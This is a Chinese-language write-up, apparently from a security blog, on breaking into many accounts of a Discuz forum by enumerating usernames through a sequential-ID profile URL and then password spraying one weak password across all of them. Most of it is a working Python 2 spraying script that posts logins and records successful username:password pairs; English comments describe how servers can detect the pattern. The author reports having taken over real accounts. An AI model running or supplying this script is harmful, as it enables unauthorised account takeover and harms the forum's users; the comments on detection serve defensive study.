在某discuz论坛上发现发帖用户的昵称都直接使用登录名,故注册了一个帐号进行登录,仔细分析之后,发现有一个url会根据id返回相应的基本用户信息,而信息里面包含了用户名!并且id是顺序递增的,这意味着可以使用脚本大批量获取该站点的用户名。此外,经过手动验证,该论坛的登录只做了纵向暴力破解防御,而没有做横向暴力破解防御,结合这两点拿下了该站点很多使用弱口令的账户。
注:
纵向暴力破解:即对单一账户使用不同的密码进行尝试,如果应用有做防御,一般会出现验证码或者锁定之类的现象。
横向暴力破解:即使用单一弱口令尝试登录不同的账户。一般情况下,为了用户体验,都会有至少3次的尝试机会,因此,如果使用高频率的密码进行尝试,则命中率是比较高的。
获取用户名脚本(此处略)。
横向暴力破解脚本:
#coding:utf-8
# Python 2 script (urllib2/cookielib, print statement). It tries one fixed
# password against every username in a file ("horizontal" brute force as the
# article calls it). Left as found; the comments describe what it does and
# what it looks like from the server side.
import sys,urllib,urllib2,cookielib,time;

url1 = "http://www.xxx.com/mobile/xxx-login.html";       # login page, fetched only to obtain a session cookie
url2 = "http://www.xxx.com/mobile/xxx-post_login.html";  # login form handler that receives the POST

def s_request(url,data,step):
    """Send one request and report whether the body contains "success".

    url  -- URL to request.
    data -- url-encoded POST body, or None for a plain GET.
    step -- 1: browser-like page fetch with a fixed Cookie header;
            any other value: XHR-style POST with Accept: application/json.
    Returns 1 if the substring "success" occurs in the response body, else 0.
    urllib2.URLError / HTTPError from urlopen are not caught here.
    """
    req = urllib2.Request(url); # build the request to send
    if(data != None):
        req.add_data(data);
    # Every request in a run carries the same hard-coded header values; with
    # one source address and one cookie jar the whole run is trivially
    # correlatable in server logs.
    req.add_header("Proxy-Connection","keep-alive");
    req.add_header("Accept-Language","zh-CN,zh;q=0.8,en;q=0.6");
    req.add_header("User-Agent","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36");
    if(step == 1):
        req.add_header("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        # Fixed cookie values copied from a browser session.
        req.add_header("Cookie","vary=ad6b4f8d4c39539fa40661c653cd4a4f6b65742dbf71bbea39c0f33572385dc0; Hm_lvt_4f2975be01c8951042db4fd8dd38717b=1399626611,1399700907,1399774576");
    else:
        req.add_header("Accept","application/json");
        req.add_header("Referer","http://www.xxx.com/mobile/xxx-login.html");
        req.add_header("Content-Type","application/x-www-form-urlencoded");
        req.add_header("X-Requested-With","XMLHttpRequest");
    resp = urllib2.urlopen(req); # send the request; returns a file-like response object
    str = resp.read();           # NOTE: shadows the builtin `str` inside this function
    # print str;
    if(str.find("success")!=-1): # "success" anywhere in the body is taken as a successful login
        return 1
    else:
        return 0;

# Install a cookie jar so cookies set by url1 are replayed automatically on url2
cj = cookielib.CookieJar();
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj));
urllib2.install_opener(opener)

u = open("D:\uid\uname.txt","r");  # input: one username per line (the enumeration step the article omits)
l = open("D:\uid\record.txt","a"); # output: usernames for which the fixed password was accepted
s_request(url1,None,1); # fetch url1 once to obtain a session cookie

# One password, many usernames. From the server's point of view this is a
# burst of failed logins across many distinct accounts from a single source
# and session, each account seeing only one attempt. That is why the
# per-account lockout the article describes never fires; a per-source or
# per-password rate limit, or a rule correlating failed logins across
# accounts, is the control that catches this pattern.
while 1:
    user = u.readline();
    if(len(user) == 0): # EOF
        break;
    user = user.replace(' ','');
    print user;
    data = {"returnUrl":"http%3A%2F%2Fwww.xxx.com%2Findex.php","password":"123456","uname":user,};
    data = urllib.urlencode(data);
    if(s_request(url2,data,2) == 1): # attempt the login
        l.write(user+":"+"123456"+" "); # record username and password to the output file
        l.flush();
    s_request(url1,None,1); # fetch url1 again to refresh the cookie
u.close();
l.close();